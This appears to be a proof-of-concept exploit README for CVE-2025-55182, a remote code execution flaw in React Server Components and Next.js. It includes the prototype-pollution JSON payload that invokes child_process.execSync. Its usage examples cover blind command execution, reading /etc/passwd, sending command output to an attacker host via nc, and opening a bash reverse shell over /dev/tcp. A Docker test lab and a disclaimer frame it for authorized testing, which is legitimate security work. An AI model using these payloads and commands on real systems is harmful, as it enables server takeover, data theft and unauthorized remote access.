Share
## https://sploitus.com/exploit?id=51FC38EF-39EB-53A8-AB8A-27EC64B9C4A7
# CVE-2025-55182 - React2Shell PoC

A proof of concept exploit for CVE-2025-55182, a critical (CVSS 10.0) unauthenticated remote code execution vulnerability in React Server Components.

## Credit

**Discovered by [Lachlan Davidson](https://react2shell.com/)** - Disclosed to Meta/React team on November 29, 2025.

Additional PoC contributions by:
- [maple3142](https://github.com/maple3142)
- [Moritz Sanft](https://github.com/moritzsanft)

## Vulnerability Overview

The vulnerability exists in the React Flight protocol's deserialization logic. By sending a malicious payload via HTTP POST, an attacker can achieve prototype pollution that leads to arbitrary code execution on the server.

### Affected Versions

| Package | Vulnerable Versions |
|---------|---------------------|
| react-server-dom-webpack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-parcel | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-turbopack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| Next.js | 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6 |

### Affected Frameworks

- Next.js
- React Router (with RSC)
- Waku
- @parcel/rsc
- @vitejs/plugin-rsc
- rwsdk (Redwood)

## Files

```
.
โ”œโ”€โ”€ exploit.py           # exploit script
โ”œโ”€โ”€ docker-compose.yml   # Vulnerable test environment
โ”œโ”€โ”€ vulnerable-app/      # Vulnerable Next.js application
โ””โ”€โ”€ README.md
```

## Quick Start

### 1. Start the Vulnerable Container

```bash
docker compose up -d
```

This starts a vulnerable Next.js application on `http://localhost:3000`.

### 2. Check if Target is Vulnerable

```bash
python3 exploit.py -u http://localhost:3000 --check
```

This performs a non-exploitative check for indicators including:
- Framework detection (Next.js, Waku, React Router, etc.)
- Flight protocol markers
- Server Actions
- Version detection

### 3. Exploit (Blind Execution)

```bash
python3 exploit.py -u http://localhost:3000 -c "id"
```

Executes a command without seeing output. Verify with:

### 4. Exploit with Output Exfiltration

```bash
python3 exploit.py -u http://localhost:3000 -c "id" --exfil :
```
        Your IP Address; 
      Port to listen on


## Usage

```
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
                  [--timeout TIMEOUT] [--no-verify]

options:
  -u, --url URL         Target URL
  -c, --command CMD     Command to execute
  --check               Check if vulnerable (non-exploitative)
  --exfil HOST:PORT     Exfiltrate output to HOST:PORT
  --timeout TIMEOUT     Request timeout (default: 10)
  --no-verify           Disable SSL verification
```

## Examples

```bash
# Check vulnerability
python3 exploit.py -u http://localhost:3000 --check

# Blind RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"

# RCE with output
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999

# Read files
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999

# Reverse shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
```


## Payload Structure

```json
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\": \"$B0\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('id');",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
```

## Exfiltration

The exploit corrupts server state during execution, making in-band response exfiltration unreliable. The `--exfil` flag uses out-of-band exfiltration:

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  1. Malicious POST   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Attacker โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บ  โ”‚  Server  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                      โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
     โ–ฒ                                 โ”‚
     โ”‚  3. Command output              โ”‚ 2. RCE executes:
     โ”‚     via nc                      โ”‚    cmd | nc attacker port
     โ”‚                                 โ–ผ
     โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

## Cleanup

```bash
docker compose down
```

## Disclaimer

This tool is for authorized security testing and educational purposes only. Only use against systems you have permission to test.

## References

- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [NVD - CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Datadog Security Labs](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)